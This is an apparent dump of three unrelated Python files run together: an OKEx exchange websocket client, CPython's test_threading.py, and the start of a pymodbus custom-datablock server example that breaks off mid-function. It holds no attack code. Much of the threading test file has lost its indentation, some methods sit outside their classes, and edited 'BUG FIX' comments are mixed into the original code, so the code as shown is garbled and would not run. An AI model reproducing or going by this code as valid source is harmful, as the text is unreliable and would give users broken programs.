    def sendDataRequest(self, channel):
        """Send a (non-trading) market-data subscription request."""
        d = {}
        d['event'] = 'addChannel'
        d['channel'] = channel
        j = json.dumps(d)
        print(j)
        try:
            self.ws.send(j)
        except websocket.WebSocketConnectionClosedException:
            pass

    #----------------------------------------------------------------------
    def login(self):
        """Send a login request; returns True if the message was sent."""
        params = {}
        params['api_key'] = self.apiKey
        params['sign'] = self.generateSign(params)
        # Build and serialize the request.
        d = {}
        d['event'] = 'login'
        d['parameters'] = params
        j = json.dumps(d)
        try:
            self.ws.send(j)
            return True
        except websocket.WebSocketConnectionClosedException:
            return False
########################################################################
class OkexSpotApi(OkexApi):
    """Spot trading interface."""

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        super(OkexSpotApi, self).__init__()

    #----------------------------------------------------------------------
    def subscribeSpotTicker(self, symbol):
        """Subscribe to tick data for a spot symbol."""
        self.sendDataRequest('ok_sub_spot_%s_ticker' % symbol)

    #----------------------------------------------------------------------
    def subscribeSpotDepth(self, symbol, depth=0):
        """Subscribe to spot order-book depth; depth=0 means full depth."""
        channel = 'ok_sub_spot_%s_depth' % symbol
        if depth:
            channel = channel + '_' + str(depth)
        self.sendDataRequest(channel)

    #----------------------------------------------------------------------
    def subscribeSpotDeals(self, symbol):
        """Subscribe to executed deals for a spot symbol."""
        self.sendDataRequest('ok_sub_spot_%s_deals' % symbol)

    #----------------------------------------------------------------------
    def subscribeSpotKlines(self, symbol, period):
        """Subscribe to spot candlesticks for a symbol at a given period."""
        self.sendDataRequest('ok_sub_spot_%s_kline_%s' % (symbol, period))

    #----------------------------------------------------------------------
    def spotTrade(self, symbol, type_, price, amount):
        """Place a spot order."""
        params = {
            'symbol': str(symbol),
            'type': str(type_),
            'price': str(price),
            'amount': str(amount),
        }
        self.sendTradingRequest('ok_spot_order', params)

    #----------------------------------------------------------------------
    def spotCancelOrder(self, symbol, orderid):
        """Cancel a spot order."""
        params = {
            'symbol': str(symbol),
            'order_id': str(orderid),
        }
        self.sendTradingRequest('ok_spot_cancel_order', params)

    #----------------------------------------------------------------------
    def spotUserInfo(self):
        """Query the spot account."""
        self.sendTradingRequest('ok_spot_userinfo', {})

    #----------------------------------------------------------------------
    def spotOrderInfo(self, symbol, orderid):
        """Query the state of a spot order."""
        params = {
            'symbol': str(symbol),
            'order_id': str(orderid),
        }
        self.sendTradingRequest('ok_spot_orderinfo', params)
########################################################################
class OkexFuturesApi(OkexApi):
    """Futures trading interface.

    Settlement push message (sent automatically during the hour before
    settlement; no subscription needed):

    [{
        "channel": "btc_forecast_price",
        "timestamp":"1490341322021",
        "data": "998.8"
    }]

    data(string): estimated settlement price
    timestamp(string): timestamp
    """

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        super(OkexFuturesApi, self).__init__()

    #----------------------------------------------------------------------
    def subsribeFuturesTicker(self, symbol, contractType):
        """Subscribe to futures tick data (method name typo kept for
        backward compatibility)."""
        self.sendDataRequest('ok_sub_futureusd_%s_ticker_%s' % (symbol, contractType))

    #----------------------------------------------------------------------
    def subscribeFuturesKline(self, symbol, contractType, period):
        """Subscribe to futures candlesticks."""
        self.sendDataRequest('ok_sub_futureusd_%s_kline_%s_%s' % (symbol, contractType, period))

    #----------------------------------------------------------------------
    def subscribeFuturesDepth(self, symbol, contractType, depth=0):
        """Subscribe to futures order-book depth; depth=0 means full depth."""
        channel = 'ok_sub_futureusd_%s_depth_%s' % (symbol, contractType)
        if depth:
            channel = channel + '_' + str(depth)
        self.sendDataRequest(channel)

    #----------------------------------------------------------------------
    def subscribeFuturesTrades(self, symbol, contractType):
        """Subscribe to futures trades."""
        self.sendDataRequest('ok_sub_futureusd_%s_trade_%s' % (symbol, contractType))

    #----------------------------------------------------------------------
    def subscribeFuturesIndex(self, symbol):
        """Subscribe to the futures index for a symbol."""
        self.sendDataRequest('ok_sub_futureusd_%s_index' % symbol)

    #----------------------------------------------------------------------
    def futuresTrade(self, symbol, contractType, type_, price, amount, matchPrice='0', leverRate='10'):
        """Place a futures order."""
        params = {
            'symbol': str(symbol),
            'contract_type': str(contractType),
            'price': str(price),
            'amount': str(amount),
            'type': type_,               # 1: open long  2: open short  3: close long  4: close short
            'match_price': matchPrice,   # counterparty-price flag: 0 no, 1 yes (price ignored when 1)
            'lever_rate': leverRate,
        }
        self.sendTradingRequest('ok_futureusd_trade', params)

    #----------------------------------------------------------------------
    def futuresCancelOrder(self, symbol, orderid, contractType):
        """Cancel a futures order."""
        params = {
            'symbol': str(symbol),
            'order_id': str(orderid),
            'contract_type': str(contractType),
        }
        self.sendTradingRequest('ok_futureusd_cancel_order', params)

    #----------------------------------------------------------------------
    def futuresUserInfo(self):
        """Query the futures account."""
        self.sendTradingRequest('ok_futureusd_userinfo', {})

    #----------------------------------------------------------------------
    def futuresOrderInfo(self, symbol, orderid, contractType, status, current_page, page_length=10):
        """Query futures orders, paginated."""
        params = {
            'symbol': str(symbol),
            'order_id': str(orderid),
            'contract_type': str(contractType),
            'status': str(status),
            'current_page': str(current_page),
            'page_length': str(page_length),
        }
        self.sendTradingRequest('ok_futureusd_orderinfo', params)
|
test_threading.py | # Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose, cpython_only
from test.script_helper import assert_python_ok
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
try:
import _testcapi
except ImportError:
_testcapi = None
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
    """Minimal integer counter shared between test threads; callers are
    expected to serialize inc()/dec() themselves (see TestThread's mutex)."""

    def __init__(self):
        # Current count, mutated by inc()/dec().
        self.value = 0

    def inc(self):
        """Increment the count by one."""
        self.value += 1

    def dec(self):
        """Decrement the count by one."""
        self.value -= 1

    def get(self):
        """Return the current count."""
        return self.value
class TestThread(threading.Thread):
# Worker thread used by ThreadTests.test_various_ops: sleeps for a short
# random delay while checking, under 'mutex', that no more than 3 threads
# (bounded by the semaphore 'sema') run concurrently.
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
# Shared Counter of currently running TestThread instances.
self.nrunning = nrunning
def run(self):
# Random sub-100us delay so thread interleavings vary between runs.
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
# The semaphore is bounded at 3, so at most 3 threads are inside.
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
# Common fixture: snapshot the set of live threads before each test, then
# clean up stray threads and reap child processes afterwards.
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
    # A Thread must not keep its target (or args/kwargs) alive once it has
    # finished, even when those references form a cycle back to the object
    # that owns the thread.
    class RunSelfFunction(object):
        def __init__(self, should_raise):
            # The links in this refcycle from Thread back to self
            # should be cleaned up when the thread completes.
            self.should_raise = should_raise
            self.thread = threading.Thread(target=self._run,
                                           args=(self,),
                                           kwargs={'yet_another':self})
            self.thread.start()

        def _run(self, other_ref, yet_another):
            if self.should_raise:
                raise SystemExit

    # Normal exit: the weakref must go dead once the thread finishes.
    cyclic_object = RunSelfFunction(should_raise=False)
    weak_cyclic_object = weakref.ref(cyclic_object)
    cyclic_object.thread.join()
    del cyclic_object
    self.assertEqual(None, weak_cyclic_object(),
                     msg=('%d references still around' %
                          sys.getrefcount(weak_cyclic_object())))

    # Exit via SystemExit raised inside the thread: same expectation.
    raising_cyclic_object = RunSelfFunction(should_raise=True)
    weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
    raising_cyclic_object.thread.join()
    del raising_cyclic_object
    self.assertEqual(None, weak_raising_cyclic_object(),
                     msg=('%d references still around' %
                          sys.getrefcount(weak_raising_cyclic_object())))
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
    # Issue #14308: a dummy thread in the active list doesn't mess up
    # the after-fork mechanism.
    code = """if 1:
        import thread, threading, os, time

        def background_thread(evt):
            # Creates and registers the _DummyThread instance
            threading.current_thread()
            evt.set()
            time.sleep(10)

        evt = threading.Event()
        thread.start_new_thread(background_thread, (evt,))
        evt.wait()
        assert threading.active_count() == 2, threading.active_count()
        if os.fork() == 0:
            assert threading.active_count() == 1, threading.active_count()
            os._exit(0)
        else:
            os.wait()
    """
    # Any output from the child means a failed assert in the child
    # interpreter; a clean run prints nothing.
    _, out, err = assert_python_ok("-c", code)
    self.assertEqual(out, '')
    self.assertEqual(err, '')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
    # Try hard to trigger #18418: is_alive() could sometimes be True on
    # threads that vanished after a fork.
    old_interval = sys.getcheckinterval()

    # Make the bug more likely to manifest.
    sys.setcheckinterval(10)

    try:
        for i in range(20):
            t = threading.Thread(target=lambda: None)
            t.start()
            pid = os.fork()
            if pid == 0:
                # Child: the worker thread did not survive the fork, so
                # is_alive() must be False here; exit status 1 flags the bug.
                os._exit(1 if t.is_alive() else 0)
            else:
                t.join()
                pid, status = os.waitpid(pid, 0)
                self.assertEqual(0, status)
    finally:
        sys.setcheckinterval(old_interval)
def test_BoundedSemaphore_limit(self):
    """BoundedSemaphore must raise ValueError when released beyond its limit."""
    for limit in range(1, 10):
        sem = threading.BoundedSemaphore(limit)
        # Drain the semaphore: exactly `limit` acquires succeed.
        acquirers = [threading.Thread(target=sem.acquire)
                     for _ in range(limit)]
        for worker in acquirers:
            worker.start()
        for worker in acquirers:
            worker.join()
        # Refill it: exactly `limit` releases are legal...
        releasers = [threading.Thread(target=sem.release)
                     for _ in range(limit)]
        for worker in releasers:
            worker.start()
        for worker in releasers:
            worker.join()
        # ...and one more release must fail.
        self.assertRaises(ValueError, sem.release)
class ThreadJoinOnShutdown(BaseTestCase):
    """Tests for joining threads during interpreter shutdown and across fork()."""
    # Between fork() and exec(), only async-safe functions are allowed (issues
    # #12316 and #11870), and fork() from a worker thread is known to trigger
    # problems with some operating systems (issue #3863): skip problematic tests
    # on platforms known to behave badly.
    platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
                         'os2emx')
def _run_and_join(self, script):
    """Run `script` in a child interpreter, prefixed with a helper
    (`joiningfunc`) that joins the main thread and prints 'end of thread',
    then check the combined output and exit status."""
    script = """if 1:
        import sys, os, time, threading

        # a thread, which waits for the main program to terminate
        def joiningfunc(mainthread):
            mainthread.join()
            print 'end of thread'
    \n""" + script

    p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
    rc = p.wait()
    data = p.stdout.read().replace('\r', '')
    p.stdout.close()
    # Both lines must appear, in order: main exited first, thread joined after.
    self.assertEqual(data, "end of main\nend of thread\n")
    self.assertFalse(rc == 2, "interpreter was blocked")
    self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
    # The usual case: on exit, wait for a non-daemon thread
    script = """if 1:
        import os
        t = threading.Thread(target=joiningfunc,
                             args=(threading.current_thread(),))
        t.start()
        time.sleep(0.1)
        print 'end of main'
        """
    self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
    # Like the test above, but from a forked interpreter
    script = """if 1:
        childpid = os.fork()
        if childpid != 0:
            os.waitpid(childpid, 0)
            sys.exit(0)

        t = threading.Thread(target=joiningfunc,
                             args=(threading.current_thread(),))
        t.start()
        print 'end of main'
        """
    self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
    # Like the test above, but fork() was called from a worker thread
    # In the forked process, the main Thread object must be marked as stopped.
    script = """if 1:
        main_thread = threading.current_thread()
        def worker():
            childpid = os.fork()
            if childpid != 0:
                os.waitpid(childpid, 0)
                sys.exit(0)

            t = threading.Thread(target=joiningfunc,
                                 args=(main_thread,))
            print 'end of main'
            t.start()
            t.join() # Should not block: main_thread is already stopped

        w = threading.Thread(target=worker)
        w.start()
        """
    self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
    """Run `script` in a child interpreter and assert it exits cleanly with
    exactly `expected_output` on stdout."""
    p = subprocess.Popen([sys.executable, "-c", script],
                         stdout=subprocess.PIPE)
    # BUG FIX: communicate() both drains the pipe and waits for exit.
    # The original called p.wait() and then read the pipe, which can
    # deadlock if the child fills the pipe buffer before exiting
    # (same pattern as test_recursion_limit below).
    stdout, _ = p.communicate()
    data = stdout.decode().replace('\r', '')
    self.assertEqual(p.returncode, 0, "Unexpected error")
    self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
    # There used to be a possible deadlock when forking from a child
    # thread.  See http://bugs.python.org/issue6643.
    #
    # The script takes the following steps:
    # - The main thread in the parent process starts a new thread and then
    #   tries to join it.
    # - The join operation acquires the Lock inside the thread's _block
    #   Condition.  (See threading.py:Thread.join().)
    # - We stub out the acquire method on the condition to force it to wait
    #   until the child thread forks.  (See LOCK ACQUIRED HERE)
    # - The child thread forks.  (See LOCK HELD and WORKER THREAD FORKS
    #   HERE)
    # - The main thread of the parent process enters Condition.wait(),
    #   which releases the lock on the child thread.
    # - The child process returns.  Without the necessary fix, when the
    #   main thread of the child process (which used to be the child thread
    #   in the parent process) attempts to exit, it will try to acquire the
    #   lock in the Thread._block Condition object and hang, because the
    #   lock was held across the fork.
    script = """if 1:
        import os, time, threading

        finish_join = False
        start_fork = False

        def worker():
            # Wait until this thread's lock is acquired before forking to
            # create the deadlock.
            global finish_join
            while not start_fork:
                time.sleep(0.01)
            # LOCK HELD: Main thread holds lock across this call.
            childpid = os.fork()
            finish_join = True
            if childpid != 0:
                # Parent process just waits for child.
                os.waitpid(childpid, 0)
            # Child process should just return.

        w = threading.Thread(target=worker)

        # Stub out the private condition variable's lock acquire method.
        # This acquires the lock and then waits until the child has forked
        # before returning, which will release the lock soon after.  If
        # someone else tries to fix this test case by acquiring this lock
        # before forking instead of resetting it, the test case will
        # deadlock when it shouldn't.
        condition = w._block
        orig_acquire = condition.acquire
        call_count_lock = threading.Lock()
        call_count = 0
        def my_acquire():
            global call_count
            global start_fork
            orig_acquire()  # LOCK ACQUIRED HERE
            start_fork = True
            if call_count == 0:
                while not finish_join:
                    time.sleep(0.01)  # WORKER THREAD FORKS HERE
            with call_count_lock:
                call_count += 1
        condition.acquire = my_acquire

        w.start()
        w.join()
        print('end of main')
        """
    self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
    # Check that a spawned thread that forks doesn't segfault on certain
    # platforms, namely OS X.  This used to happen if there was a waiter
    # lock in the thread's condition variable's waiters list.  Even though
    # we know the lock will be held across the fork, it is not safe to
    # release locks held across forks on all platforms, so releasing the
    # waiter lock caused a segfault on OS X.  Furthermore, since locks on
    # OS X are (as of this writing) implemented with a mutex + condition
    # variable instead of a semaphore, while we know that the Python-level
    # lock will be acquired, we can't know if the internal mutex will be
    # acquired at the time of the fork.
    script = """if True:
        import os, time, threading

        start_fork = False

        def worker():
            # Wait until the main thread has attempted to join this thread
            # before continuing.
            while not start_fork:
                time.sleep(0.01)
            childpid = os.fork()
            if childpid != 0:
                # Parent process just waits for child.
                (cpid, rc) = os.waitpid(childpid, 0)
                assert cpid == childpid
                assert rc == 0
                print('end of worker thread')
            else:
                # Child process should just return.
                pass

        w = threading.Thread(target=worker)

        # Stub out the private condition variable's _release_save method.
        # This releases the condition's lock and flips the global that
        # causes the worker to fork.  At this point, the problematic waiter
        # lock has been acquired once by the waiter and has been put onto
        # the waiters list.
        condition = w._block
        orig_release_save = condition._release_save
        def my_release_save():
            global start_fork
            orig_release_save()
            # Waiter lock held here, condition lock released.
            start_fork = True
        condition._release_save = my_release_save

        w.start()
        w.join()
        print('end of main thread')
        """
    output = "end of worker thread\nend of main thread\n"
    self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
    # Issue #13817: fork() would deadlock in a multithreaded program with
    # the ad-hoc TLS implementation.

    def do_fork_and_wait():
        # just fork a child process and wait it
        pid = os.fork()
        if pid > 0:
            os.waitpid(pid, 0)
        else:
            os._exit(0)

    # start a bunch of threads that will fork() child processes
    threads = []
    for i in range(16):
        t = threading.Thread(target=do_fork_and_wait)
        threads.append(t)
        t.start()

    # The test passes if every thread (and its forked child) completes
    # without deadlocking.
    for t in threads:
        t.join()
@cpython_only
@unittest.skipIf(_testcapi is None, "need _testcapi module")
def test_frame_tstate_tracing(self):
    # Issue #14432: Crash when a generator is created in a C thread that is
    # destroyed while the generator is still used. The issue was that a
    # generator contains a frame, and the frame kept a reference to the
    # Python state of the destroyed C thread. The crash occurs when a trace
    # function is setup.

    def noop_trace(frame, event, arg):
        # no operation
        return noop_trace

    def generator():
        while 1:
            # BUG FIX: corrected the typo "genereator" in the yielded value
            # (the value itself is never inspected by this test).
            yield "generator"

    def callback():
        # Lazily create the generator on first call, then keep advancing
        # the same generator on each subsequent call.
        if callback.gen is None:
            callback.gen = generator()
        return next(callback.gen)
    callback.gen = None

    old_trace = sys.gettrace()
    sys.settrace(noop_trace)
    try:
        # Install a trace function
        threading.settrace(noop_trace)

        # Create a generator in a C thread which exits after the call
        _testcapi.call_in_temporary_c_thread(callback)

        # Call the generator in a different Python thread, check that the
        # generator didn't keep a reference to the destroyed thread state
        for test in range(3):
            # The trace function is still called here
            callback()
    finally:
        # Always restore the previous trace function.
        sys.settrace(old_trace)
class ThreadingExceptionTests(BaseTestCase):
    """Checks that misusing the Thread API raises RuntimeError."""

    def test_start_thread_again(self):
        # A RuntimeError should be raised if Thread.start() is called
        # multiple times.
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, thread.start)

    def test_joining_current_thread(self):
        # A thread cannot join itself.
        current_thread = threading.current_thread()
        # STYLE FIX: removed a stray trailing semicolon.
        self.assertRaises(RuntimeError, current_thread.join)

    def test_joining_inactive_thread(self):
        # join() before start() is an error.
        thread = threading.Thread()
        self.assertRaises(RuntimeError, thread.join)

    def test_daemonize_active_thread(self):
        # The daemon flag may not be changed once the thread is running.
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
# Concrete instantiations of the generic lock_tests suites, bound to the
# threading module's synchronization primitives.

class LockTests(lock_tests.LockTests):
    locktype = staticmethod(threading.Lock)

class RLockTests(lock_tests.RLockTests):
    locktype = staticmethod(threading.RLock)

class EventTests(lock_tests.EventTests):
    eventtype = staticmethod(threading.Event)

class ConditionAsRLockTests(lock_tests.RLockTests):
    # An Condition uses an RLock by default and exports its API.
    locktype = staticmethod(threading.Condition)

class ConditionTests(lock_tests.ConditionTests):
    condtype = staticmethod(threading.Condition)

class SemaphoreTests(lock_tests.SemaphoreTests):
    semtype = staticmethod(threading.Semaphore)

class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
    semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
    # Issue 9670
    # test that excessive recursion within a non-main thread causes
    # an exception rather than crashing the interpreter on platforms
    # like Mac OS X or FreeBSD which have small default stack sizes
    # for threads
    script = """if True:
        import threading

        def recurse():
            return recurse()

        def outer():
            try:
                recurse()
            except RuntimeError:
                pass

        w = threading.Thread(target=outer)
        w.start()
        w.join()
        print('end of main thread')
        """
    expected_output = "end of main thread\n"
    p = subprocess.Popen([sys.executable, "-c", script],
                         stdout=subprocess.PIPE)
    stdout, stderr = p.communicate()
    data = stdout.decode().replace('\r', '')
    # A crash in the child would produce a non-zero exit status.
    self.assertEqual(p.returncode, 0, "Unexpected error")
    self.assertEqual(data, expected_output)
def test_main():
    # Aggregate all test classes in this module for regrtest.
    test.test_support.run_unittest(LockTests, RLockTests, EventTests,
                                   ConditionAsRLockTests, ConditionTests,
                                   SemaphoreTests, BoundedSemaphoreTests,
                                   ThreadTests,
                                   ThreadJoinOnShutdown,
                                   ThreadingExceptionTests,
                                   )

if __name__ == "__main__":
    test_main()
|
custom_datablock.py | #!/usr/bin/env python3
"""
Pymodbus Server With Custom Datablock Side Effect
--------------------------------------------------------------------------
This is an example of performing custom logic after a value has been
written to the datastore.
"""
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from __future__ import print_function
from pymodbus.version import version
from pymodbus.server.asynchronous import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
# DEBUG level so every modbus request/response is traced to the console.
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# create your custom data block here
# --------------------------------------------------------------------------- #
class CustomDataBlock(ModbusSparseDataBlock):
    """ A datablock that stores the new value in memory
    and performs a custom action after it has been stored.
    """

    def setValues(self, address, value):
        """ Sets the requested values of the datastore

        :param address: The starting address
        :param value: The new values to be set
        """
        super(CustomDataBlock, self).setValues(address, value)

        # whatever you want to do with the written value is done here,
        # however make sure not to do too much work here or it will
        # block the server, especially if the server is being written
        # to very quickly
        print("wrote {} to {}".format(value, address))
def run_custom_db_server():
    """Configure and start a TCP modbus server backed by CustomDataBlock."""
    # ----------------------------------------------------------------------- #
    # initialize your data store
    # ----------------------------------------------------------------------- #
    block = CustomDataBlock([0]*100)
